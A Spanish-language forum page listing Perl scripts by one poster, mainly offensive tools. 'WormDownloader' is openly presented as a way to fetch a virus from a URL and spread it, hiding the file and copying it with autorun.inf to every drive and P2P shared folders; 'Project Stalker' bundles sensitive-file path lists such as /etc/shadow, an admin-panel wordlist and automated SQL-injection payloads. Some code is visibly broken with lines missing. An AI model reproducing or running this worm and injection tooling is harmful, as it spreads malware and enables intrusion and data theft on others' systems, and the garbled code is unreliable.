| |
|
431
|
Programación / Scripting / [Perl] WormDownloader 0.3
|
en: 3 Diciembre 2011, 16:35 pm
|
Simple programa que nos sirve para bajar un virus cualquiera de una pagina para despues propagarlo por toda la computarora #!usr/bin/perl #WormDownloader 0.3 #Coded By Doddy H use Win32::File; use Cwd; use LWP::UserAgent; my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); my @rutas = ("C:\\Archivos de programa\\KMD\\My Shared Folder","C:\\Archivos de programa\\Kazaa\\My Shared Folder\\","C:\\Archivos de programa\\KaZaA Lite\\My Shared Folder\\","C:\\Archivos de programa\\Morpheus\\My Shared Folder\\","C:\Archivos de programa\\Grokster\\My Grokster\\","C:\\Archivos de programa\\BearShare\\Shared\\","C:\\Archivos de programa\\Edonkey2000\\Incoming\\","C:\\Archivos de programa\\limewire\\Shared\\","C:\\Documents and Settings\\Administrador\\Configuración local\\Datos de programa\\Ares\\My Shared Folder\\"); head(); print "\n\n[+] File to download : "; chomp(my $down = <stdin>); print "\n[+] Name to save : "; chomp(my $name= <stdin>); print "\n[+] Downloading...\n"; if (download($down,$name)) { hideit($name,"hide"); print "\n[+] Propagation routine starting\n"; wormear($down,$name); } else { print "\n[-] Error downloading\n"; } print "\n\n[+] Finished\n\n"; copyright(); <stdin>; sub wormear { my($filedown,$name) = @_; my $exe = getcwd()."/".$name; open (AUTORUN ,">>autorun.inf"); print AUTORUN "[AutoRun]\n"; print AUTORUN "open = $exe\n"; print AUTORUN "shellexecute=$exe\n"; print AUTORUN "shell\\Auto\\command=$exe\n"; for my $dir(65..90) { Win32 ::CopyFile($name,chr($dir).":/".$name,0);Win32 ::CopyFile("autorun.inf",chr($dir).":/autorun.inf",0);hideit (chr($dir).":/".$name,"hide");hideit (chr($dir).":/autorun.inf","hide");} for my $r(@rutas) { if (-d $r) { Win32::CopyFile($name,$r."/".$name,0); }}} sub hideit { if ($_[1] eq "show") { Win32::File::SetAttributes($_[0],NORMAL); } elsif ($_[1] eq "hide") { Win32::File::SetAttributes($_[0],HIDDEN); } else { #print "error\n"; } } sub download { if ($nave->mirror($_[0],$_[1])) { if (-f $_[1]) { }}} sub head { print "\n\n-- == WormDownloader == --\n"; } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; } #The End ?
|
|
|
|
|
432
|
Programación / Scripting / [Perl] USB Manager 0.2
|
en: 3 Diciembre 2011, 16:34 pm
|
Simple manager para usb #!usr/bin/perl #USB Manager 0.2 #Coded By Doddy H use Cwd; head(); nave: chomp(my $rta = <stdin>); if ($rta=~/list/) { my @files = coleccionar(getcwd()); for(@files) { if (-f $_) { print "[File] : ".$_."\n"; } else { print "[Directory] : ".$_."\n"; }}} if ($rta=~/show (.*)/) { my $fu = $1; if (-f $fu or -d $fu) { hideit($fu,"show"); print "\n\n[+] Attributes changed\n\n"; } } if ($rta=~/hide (.*)/) { my $fua = $1; if (-f $fua or -d $fua) { hideit($fua,"hide"); print "\n\n[+] Attributes changed\n\n"; } } if ($rta=~/cd (.*)/) { my $dir = $1; print "\n[+] Directory changed\n"; } else { }} if ($rta=~/del (.*)/) { my $file = getcwd()."/".$1; if (-f $file) { print "\n[+] File Deleted\n"; } else { } } else { print "\n[+] Directory Deleted\n"; } else { }}} if ($rta=~/rename (.*) (.*)/) { if (rename(getcwd ()."/".$1,getcwd ()."/".$2)) { print "\n[+] File Changed\n"; } else { }} my $file = $1; #system(getcwd()."/".$file); } if ($rta=~/help/) { print "\nCommands : help cd list del rename open hide show exit\n\n"; } copyright(); } sub coleccionar { } sub hideit { use Win32::File; if ($_[1] eq "show") { Win32::File::SetAttributes($_[0],NORMAL); } elsif ($_[1] eq "hide") { Win32::File::SetAttributes($_[0],HIDDEN); } else { } } sub head { print "\n\n-- == USB Manager == --\n"; } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; } # The End ?
|
|
|
|
|
433
|
Programación / Scripting / [Perl] SecurityManager 0.3
|
en: 3 Diciembre 2011, 16:34 pm
|
Un simple programa para ver las ultimas 5 vulnerabilidades reportadas en securityfocus #!usr/bin/perl #SecurityFocus Manager 0.3 #(C) Doddy Hackman 2011 ##ppm install http://www.bribes.org/perl/ppm/HTML-Strip.ppd use LWP::UserAgent; use HTML::Parser; use HTML::Strip; my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); refrescar(); sub refrescar { clean(); head(); print "\n\n[+] List of vulnerabilities\n\n\n"; my %links = getlinks($code); my $contador = -1; for my $da(keys %links) { $contador++; print "[$contador] : $da\n"; } [1] : Refresh [2] : Info [3] : Discussion [4] : Exploit [5] : Solution [6] : References [7] : Exit ); if ($op eq 1) { clean(); refrescar(); } elsif ($op eq 2) { my $fin = (keys %links)[$se]; my $pro = (values %links)[$se]; dar($fin,$pro,"tres"); } elsif($op eq 3) { my $fin = (keys %links)[$se]; my $pro = (values %links)[$se]; dar($fin,$pro,"cuatro"); } elsif($op eq 4) { my $fin = (keys %links)[$se]; my $pro = (values %links)[$se]; dar($fin,$pro,"cinco"); } elsif ($op eq 5) { my $fin = (keys %links)[$se]; my $pro = (values %links)[$se]; dar($fin,$pro,"seis"); } elsif ($op eq 6) { my $fin = (keys %links)[$se]; my $pro = (values %links)[$se]; dar($fin,$pro,"siete"); } elsif ($op eq 7) { copyright(); } else { refrescar(); } } sub dar { my($title,$numero,$op) = @_; print "\n\n[+] Getting data\n\n"; if ($op eq "tres") { $link = "http://www.securityfocus.com/bid/$numero/info"; } if ($op eq "cuatro") { $link = "http://www.securityfocus.com/bid/$numero/discuss"; } if ($op eq "cinco") { $link = "http://www.securityfocus.com/bid/$numero/exploit"; } if ($op eq "seis") { $link = "http://www.securityfocus.com/bid/$numero/solution"; } if ($op eq "siete") { $link = "http://www.securityfocus.com/bid/$numero/references"; } my $code = toma($link); if ($code=~/<div id ="vulnerability">(.*?)<\ /div >/s){ my $code = $1; my $uno = HTML::Strip->new(emit_spaces =>1); my $final = $uno->parse($code); $final =~ s/^[\t\f ]+|[\t\f ]+$//mg; } print "\n\n[+] Press any key to continue\n\n"; <stdin>; refrescar(); } sub getlinks { my $code = toma("http://www.securityfocus.com/"); my $test = HTML::Parser->new( start_h => [\&start, "tagname,attr"], text_h => [\&text, "dtext"], ); $test->parse($code); sub start { my($a,$b) = @_; my %e = %$b; unless($a ne "a") { $d = $e{href}; $c = $a; }} sub text { unless($c ne "a") { if ($d=~/\/bid\/(.*)/) { my $id = $1; unless($title=~/www.securityfocus.com/) { $links{$title} = $id; }} $d = ""; }} } sub toma { return $nave->get($_[0])->content; } sub repes { foreach $test(@_) { push @limpio,$test unless $repe{$test}++; } } sub clean { #if ($^O =~/Win32/ig) { #} else { #system("clear"); #} } sub head { print "\n\n-- == SecurityFocus Manager 0.3 == --\n\n"; } sub copyright { print "\n\n\n(C) Doddy Hackman 2011\n\n"; } #Credits: Thanks to explorer (perlenespanol) # The End ?
|
|
|
|
|
434
|
Programación / Scripting / [Perl] ScanPort 0.5
|
en: 3 Diciembre 2011, 16:33 pm
|
Simple scanner port en perl #!usr/bin/perl #ScanPort 0.5 #Examples #perl scan.pl -target localhost -option fast #perl scan.pl -target localhost -option full -parameters 1-100 use IO::Socket; use Getopt::Long; GetOptions( "-target=s" => \$target, "-option=s" => \$opcion, "-parameters=s"=>\$parameters ); head(); unless($target) { sintax(); } else { if ($opcion eq "fast") { scanuno($target); } if ($opcion eq "full" and $parameters) { if($parameters=~/(.*)-(.*)/) { my $start = $1; my $end = $2; scandos($target,$start,$end); } } } copyright(); sub scanuno { my %ports = ("21"=>"ftp", "22"=>"ssh", "25"=>"smtp", "80"=>"http", "110"=>"pop3", "3306"=>"mysql" ); print "\n[+] Scanning $_[0]\n\n\n"; for my $port(keys %ports) { if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) { print "[Port] : ".$port." [Service] : ".$ports{$port}."\n"; } } print "\n\n[+] Scan Finish\n"; } sub scandos { print "\n[+] Scanning $_[0]\n\n\n"; for my $port($_[1]..$_[2]) { if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) { print "[Port] : $port\n"; } } print "\n\n[+] Scan Finish\n"; } sub head { print "-- == ScanPort 0.5 == --\n\n"; } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; } sub sintax { print "\n[+] sintax : $0 -target target -option fast/full -parameters 1-9999\n"; } # The End ?
|
|
|
|
|
435
|
Programación / Scripting / [Perl] Project Stalker 0.5
|
en: 3 Diciembre 2011, 16:33 pm
|
Lo mismo que la version anterior solo se le mejoro el cliente para vulnerabilidades SQLi #!usr/bin/perl #Project STALKER 0.5 #Coded By Doddy H # #ppm install http://www.bribes.org/perl/ppm/DBI.ppd #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd # use IO::Socket; use HTML::LinkExtor; use LWP::UserAgent; use Win32::Process; use Net::FTP; use Cwd; use URI ::Split qw(uri_split ); use MIME::Base64; use DBI; use Color::Output; Color::Output::Init my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog'); @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx' ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx' ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx' ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx' ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx' ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx' ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp' ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx' ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php' ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php' ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php' ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php' ,'administration/','administration/index.php','administration/login.php' ,'administrator/index.php','administrator/login.php','administrator/system.php','system/' ,'system/login.php','admin.php','login.php','administrador.php','administration.php' ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php' ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html' ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html' ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html' ,'administrator/','administrator/index.html','administrator/login.html' ,'administrator/account.html','administrator/account.php','administrator.html','login.html' ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php' ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/' ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html' ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp' ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp' ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp' ,'administrator/login.asp','administrator/account.asp','administrator.asp' ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp' ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/' ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php' ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp' ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html' ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html' ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp' ,'webadmin.html','administratie/','admins/','admins.php','admins.asp' ,'admins.html','administrivia/','Database_Administration/','WebAdmin/' ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/' ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/' ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/' ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/ ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/ ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/ ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/ ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/' ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/' ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/' ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/' ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/' ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/' ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/' ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/' ,'server/','database_administration/','power_user/','system_administration/' ,'ss_vms_admin_sm/'); unless (-d "/logs/webs") { } my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); getinfo(); $SIG{INT} = \&next; while(1) { cprint "\x037"; #13 menujo(); cprint "\x030"; } sub getinfo { $so = $^O; $login = Win32::LoginName(); $domain = Win32::DomainName(); cprint "\x0313"; #13 print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n"; cprint "\x030"; } sub menujo { chomp (my $cmd = <stdin>); if ($cmd=~/getinfo/ig) { getinfo(); } if ($cmd =~/getip (.*)/) { my $te = $1; if ($te eq "" or $te eq " ") { print "\n[+] sintax : getip <host>\n"; } print "\n[IP] : ".getip ($1)."\n"; } elsif ($cmd =~/getlink (.*)/) { print "[+] Extracting links in the page\n\n\n"; $code = toma($1); my @re = get_links($code); for my $url(@re) { } print "\n\n[+] Finish\n"; } elsif ($cmd=~/help/) { helpme(); } elsif ($cmd=~/getprocess/) { my %re = getprocess(); ($proceso,$pid) = ($t=~/(.*):(.*)/ig); print "[+] Proceso : ".$data."\n"; print "[+] PID : ".$re{$data}."\n\n"; } } elsif ($cmd=~/killprocess (.*) (.*)/) { if (killprocess($1,$2)) { print "[+] Process $1 closed"; } } elsif ($cmd=~/conec (.*) (.*) (.*)/) { print conectar ($1,$2,$3); } elsif ($cmd=~/allow (.*)/) { $re = conectar($1,"80","GET / HTTP/1.0\r\n"); if ($re=~/Allow:(.*)/ig) { print "[+] Metodos : ".$1."\n"; }} elsif ($cmd=~/paths (.*)/) { scanpaths($1); } elsif ($cmd=~/encodehex (.*)/) { print "\n\n[+] ".hex_en ($1)."\n\n"; } elsif ($cmd=~/decodehex (.*)/) { print "\n\n[+] ".hex_de ($1)."\n\n"; } elsif ($cmd=~/download (.*) (.*)/) { my $file,$name = $1,$2; if (download($1,$2)) { print "[+] File downloaded\n"; } } elsif ($cmd=~/encodeascii (.*)/) { print "\n\n[+] ".ascii ($1)."\n\n"; } elsif ($cmd=~/decodeascii (.*)/) { print "\n\n[+] ".ascii_de ($1)."\n\n"; } elsif ($cmd=~/encodebase (.*)/) { print "\n\n[+] ".base ($1)."\n\n"; } elsif ($cmd=~/decodebase (.*)/) { print "\n\n[+] ".base_de ($1)."\n\n"; } elsif ($cmd=~/aboutme/) { aboutme(); } elsif ($cmd=~/scanport (.*)/) { scanport($1); } elsif ($cmd=~/panel (.*)/) { scanpanel($1); } elsif ($cmd=~/scangoogle/) { chomp(my $dork = <stdin>); chomp(my $pages = <stdin>); print "\n\n[Starting the search]\n\n"; my @links = google($dork,$pages); print "\n[Links Found] : ".int(@links)."\n\n\n"; print "[Starting the scan]\n\n\n"; for my $link(@links) { if ($link=~/(.*)=/ig) { my $web = $1; sql($web."="); }} print "\n\n[+] Finish\n"; } elsif ($cmd=~/getpass (.*)/) { crackit($1); } elsif ($cmd=~/ftp (.*) (.*) (.*)/) { ftp($1,$2,$3); } elsif ($cmd=~/navegator/) { nave: chomp(my $rta = <stdin>); if ($rta=~/list/) { my @files = coleccionar(getcwd()); for(@files) { if (-f $_) { print "[File] : ".$_."\n"; } else { print "[Directory] : ".$_."\n"; }}} if ($rta=~/cd (.*)/) { my $dir = $1; print "\n[+] Directory changed\n"; } else { }} if ($rta=~/del (.*)/) { my $file = getcwd()."/".$1; if (-f $file) { print "\n[+] File Deleted\n"; } else { } } else { print "\n[+] Directory Deleted\n"; } else { }}} if ($rta=~/rename (.*) (.*)/) { if (rename(getcwd ()."/".$1,getcwd ()."/".$2)) { print "\n[+] File Changed\n"; } else { }} my $file = $1; #system(getcwd()."/".$file); } if ($rta=~/help/) { print "\nCommands : help cd list del rename open exit\n\n"; } next; } } elsif ($cmd=~/kobra (.*)/) { my $url = $1; scansqli($url,"--"); } elsif ($cmd=~/mysql (.*) (.*) (.*)/) { enter($1,$2,$3); } copyright(); <stdin>; } else { } #print "\n\n"; } sub scansqli { my $page = $_[0]; print "[Status] : Scanning.....\n"; ($pass1,$bypass2) = &bypass($_[1]); my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; if ($_[0]=~/hackman/ig) { savefile($save.".txt","\n[Target Confirmed] : $_[0]\n"); &menu_options($_[0],$pass,$save); } else { my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2); my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2); unless ($testar1 eq $testar2) { motor($page,$_[1]); } else { print "\n[-] Not vulnerable\n\n"; print "[+] Scan anyway y/n : "; if ($op eq "y") { motor($page,$_[1]); } else { #head(); #menu(); }}}} sub motor { my ($gen,$save,$control) = &length($_[0],$_[1]); if ($control eq 1) { print "[Status] : Enjoy the menu\n\n"; &menu_options($gen,$pass,$save); } else { print "[Status] : Length columns not found\n\n"; } } print "\n[+] Looking for the number of columns\n\n"; my $rows = "0"; my $asc; my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")"; $total = "1"; for my $rows(2..200) { $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; $total.= ",".$rows; $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc; $test = toma($injection); if ($test=~/RATSXPDOWN/) { @number = $test =~m{RATSXPDOWN (\d+)RATSXPDOWN }g ; $control = 1; my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; savefile($save.".txt","\n[Target confirmed] : $page"); savefile($save.".txt","[Bypass] : $_[1]\n"); savefile($save.".txt","[Limit] : The site has $rows columns"); savefile($save.".txt","[Data] : The number @number print data"); $total=~s/$number[0]/hackman /; savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total); return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control); } } } sub details { my ($page,$bypass,$save) = @_; ($pass1,$pass2) = &bypass($bypass); savefile($save.".txt","\n"); if ($page=~/(.*)hackman(.*)/ig) { print "\n[+] Searching information..\n\n"; my ($start,$end) = ($1,$2); $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2; $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2; $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ($test2=~/ERTOR854/ig) { savefile($save.".txt","[mysql.user] : ON"); print "[mysql.user] : ON\n"; } else { print "[mysql.user] : OFF\n"; savefile($save.".txt","[mysql.user] : OFF"); } if ($test1=~/ERTOR854/ig) { print "[information_schema.tables] : ON\n"; savefile($save.".txt","[information_schema.tables] : ON"); } else { print "[information_schema.tables] : OFF\n"; savefile($save.".txt","[information_schema.tables] : OFF"); } if ($test3=~/ERTOR854/ig) { print "[load_file] : ON\n"; savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start.$concat.$end.$pass2; $code = toma($injection); if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) { print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n"; savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n"); } else { print "\n[-] Not found any data\n"; } } } sub menu_options { my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; print "\n/logs/webs/$save>"; chomp (my $rta = <stdin>); if ($rta=~/help/) { commands : details tables columns dbs othertable othercolumn mysqluser dumper createshell readfile logs exit ); } if ($rta =~/tables/) { schematables($_[0],$_[1],$save); &reload; } elsif ($rta =~/columns (.*)/) { my $tabla = $1; schemacolumns($_[0],$_[1],$save,$tabla); &reload; } elsif ($rta =~/dbs/) { &schemadb($_[0],$_[1],$save); &reload; } elsif ($rta =~/othertable (.*)/) { my $data = $1; 